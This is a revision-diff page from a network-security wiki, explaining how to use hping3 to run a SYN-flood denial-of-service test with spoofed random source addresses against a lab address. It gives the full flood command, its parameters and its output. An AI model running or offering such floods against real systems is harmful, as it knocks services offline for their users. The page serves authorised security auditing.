Difference between revisions of "HowTo Perform A Security Audit With hping3 (DoS)"

From NST Wiki
Jump to navigationJump to search
(DoS Using hping3)
(DoS Using hping3)
Line 28: Line 28:
 
|Force packets to use this network interface device: "'''lan0'''"  only.
 
|Force packets to use this network interface device: "'''lan0'''"  only.
 
|-
 
|-
|-c 1000000
+
| -c 1000000
 
|Stop after sending (and receiving) count response packets.
 
|Stop after sending (and receiving) count response packets.
 
|-
 
|-
|-d 120
+
| -d 120
 
|Set the packet body size.
 
|Set the packet body size.
 
|-
 
|-
|-S
+
| -S
 
|Set the TCP/IP SYN flag thus sending out sync packets.
 
|Set the TCP/IP SYN flag thus sending out sync packets.
 
|-
 
|-
|-w 64
+
| -w 64
 
|Set the TCP/IP window size: "'''64 octets'''"
 
|Set the TCP/IP window size: "'''64 octets'''"
 
|}
 
|}

Revision as of 12:31, 22 October 2016

Overview

This page discusses the use of hping3 to perform a Denial-of-Service (DoS) attack as part of a security audit. Information on this page was derived from the blackMORE Ops article: "Denial-of-service Attack – DoS using hping3 with spoofed IP in Kali Linux". hping3 is install on Network Security Toolkit (NST) like many other security auditing and penetration tools.

hping3 Explained

hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time.

Like most tools used in computer security, hping3 is useful to security experts, but there are a lot of applications related to network testing and system administration.

hping3 Intended Use Cases

  • Traceroute / ping / probe hosts behind a firewall that blocks attempts using the standard utilities.
  • Perform the idle scan (now implemented in nmap with an easy user interface).
  • Test firewall rule sets.
  • Test IDS systems.
  • Exploit known vulnerabilities of TCP/IP stacks.
  • Networking research.
  • Learn and explore TCP/IP.
  • Write real applications related to TCP/IP testing and security.
  • Automated firewall tests.
  • Proof of concept exploits.
  • Networking and security research when there is the need to emulate complex TCP/IP behavior.
  • Prototype IDS systems.
  • Simple to use networking utilities with Tk interface.

DoS Using hping3

This use case will demonstrate a DoS TCP/IP sync attack using hping3. The intended target: IPv4 Address: 10.222.222.15 will be flooded with TCP/IP sync packets. One can the observed the behavior of the target system during the DoS attack for stability, responsiveness and performance. The following parameters are explained for this use case:

Force packets to use this network interface device: "lan0" only.
-c 1000000 Stop after sending (and receiving) count response packets.
-d 120 Set the packet body size.
-S Set the TCP/IP SYN flag thus sending out sync packets.
-w 64 Set the TCP/IP window size: "64 octets"

 

[root@probe ~]# /usr/sbin/hping3 -I lan0 -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.222.222.15;

HPING 10.222.222.15 (lan0 10.222.222.15): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown
^C
--- 10.222.222.15 hping statistic ---
2031701 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

[root@probe ~]#